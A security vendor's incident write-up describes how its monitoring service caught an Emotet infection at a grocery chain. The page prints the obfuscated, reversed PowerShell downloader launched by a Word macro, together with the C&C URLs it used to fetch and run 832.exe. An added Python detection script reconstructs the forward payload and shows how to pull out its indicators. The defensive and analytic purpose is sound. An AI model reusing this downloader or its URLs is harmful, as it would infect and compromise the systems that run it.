Emotet Malware Ejected

The Network: Our customer is a major grocery chain with more than 150 stores in 22 states across the USA with a well-administered IT network.

The Expectation: Extensive prevention technologies are deployed to keep the HQ assets including the data center and workstations of the staff safe. It is recognized that perfect protection is not practical and so they use the SIEMphonic service for monitoring.

The Catch: A first-time-seen process (832.exe) was observed to be executing on a user workstation. The process flow showed that the user had opened an MS Word document called doc-843882.doc that had arrived as an attachment.

The Find: The SIEMphonic security analyst was able to trace the flow of actions. Unbeknownst to the user, a VBA (Visual Basic for Applications) macro embedded in the MS Word document spawned a command shell and executed the following PowerShell command:

cmd /V/C"set NnQ=                 }}{hctac};kaerb;hZP$ metI-ekovnI;)hZP$ ,soj$(eliFdaolnwoD.rVS${yrt{)Rhl$ nisoj$(hcaerof;''exe.''+foO$+''\''+cilbup:vne$=hZP$;''238'' = foO$;)''@''(tilpS.''CrW2GZfa/sdaolpu/tnetnoc-pw/ek.ca.ibnou.murofur//:ptth@0csAVpJ05D/ln.rezjiwebraav//:ptth@YVLs5fQq3m/moc.enotsaniv//:ptth@optEUfXNM/moc.odsalp.www//:ptth@ZvyL64iq0w/baltset/if.monatad.s. 

A connection was established, without the user's knowledge, to the command & control (C&C) servers at http://www[.]plasdo[.]com/MNXfUEtpo, http://vinastone[.]com/m3qQf5sLVY, http://vaarbewijzer[.]nl/D50JpVAsc0 and http://ruforum[.]uonbi[.]ac[.]ke/wp-content/uploads/afZG2WrC. The malware 832.exe was then dropped on disk and executed.
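As an added example (not from the original post or from EventTracker), the following Python triage script shows how a SOC analyst can flag the pattern described above, an Office process spawning a shell whose command line carries a reversed PowerShell script, and recover the download URLs and dropped file name from the captured command line. The Sysmon-style field names and the forward form of the script, reconstructed from the truncated command above, are assumptions; the URLs are kept defanged with [.] as the page lists them.

```python
import re
from typing import Optional

# Constructed sample modelled on the launcher above: the PowerShell script is stored
# reversed in an environment variable (set NnQ=...) so its readable form never touches
# disk. URLs stay defanged with [.] exactly as the page lists them.
FORWARD = (
    "$lhR=''http://www[.]plasdo[.]com/MNXfUEtpo@http://vinastone[.]com/m3qQf5sLVY"
    "@http://vaarbewijzer[.]nl/D50JpVAsc0''.Split(''@'');$Oof = ''832'';"
    "$PZh=$env:public+''\\''+$Oof+''.exe'';"
    "foreach($jos in $lhR){try{$SVr.DownloadFile($jos, $PZh);Invoke-Item $PZh;break;}catch{}}"
)
SAMPLE_CMDLINE = 'cmd /V/C"set NnQ=      ' + FORWARD[::-1] + '"'
SAMPLE_EVENT = {  # Sysmon-style process-creation fields (constructed)
    "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "Image": "C:\\Windows\\System32\\cmd.exe",
    "CommandLine": SAMPLE_CMDLINE,
}
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
# Reversed spellings of cmdlets/variables in the payload: cheap, high-signal markers.
REVERSED_MARKERS = tuple(s[::-1] for s in ("Invoke-Item", "DownloadFile", "$env:public"))

def is_suspicious(event: dict) -> bool:
    """Office app spawning a shell whose command line carries reversed PowerShell."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    child = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    shell_from_office = parent in OFFICE_PARENTS and child in ("cmd.exe", "powershell.exe")
    return shell_from_office and any(marker in cmd for marker in REVERSED_MARKERS)

def extract_reversed_payload(cmdline: str) -> Optional[str]:
    """Pull the 'set VAR=' value out of the cmd line and un-reverse it."""
    m = re.search(r'set\s+\w+=(.*?)(?:&&|"?\s*$)', cmdline, re.S)
    return m.group(1).strip()[::-1] if m else None

def extract_urls(script: str) -> list:
    """Recover the '@'-joined download list that is passed to .Split(''@'')."""
    m = re.search(r"''(https?://.*?)''\.Split\(''@''\)", script)
    return m.group(1).split("@") if m else []

def extract_dropped_file(script: str) -> Optional[str]:
    """Rebuild the dropped file name from $env:public + $Var + '.exe'."""
    m = re.search(r"\$env:public\+''\\''\+\$(\w+)\+''(\.\w+)''", script)
    if not m:
        return None
    var, ext = m.groups()
    v = re.search(r"\$" + re.escape(var) + r"\s*=\s*''([^']*)''", script)
    return v.group(1) + ext if v else None
```

Run over a real process-creation feed, is_suspicious() gives the alert and the extract_* helpers give the analyst the IOCs to block and the file name to hunt for on other hosts.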

The Fix: The EventTracker SOC (Security Operations Center) promptly alerted the grocery chain’s system administrator to quarantine the infected workstation. The user who had logged in remotely was forcibly logged off and reminded of security best practices for unknown attachments.

The Lesson: Attackers are relentless, and automation allows the launch of a high volume of such attacks at low cost. A slip-up by one user can be problematic; if undetected, such infections will steal data, spread laterally and cause havoc. Workstations are the most vulnerable because they have widespread deployment and are used by non-technical users who are susceptible to cleverly crafted attacks. Continuous monitoring by the SIEMphonic service provides visibility and threat detection that avoids disrupted operations and the potential loss of sensitive data.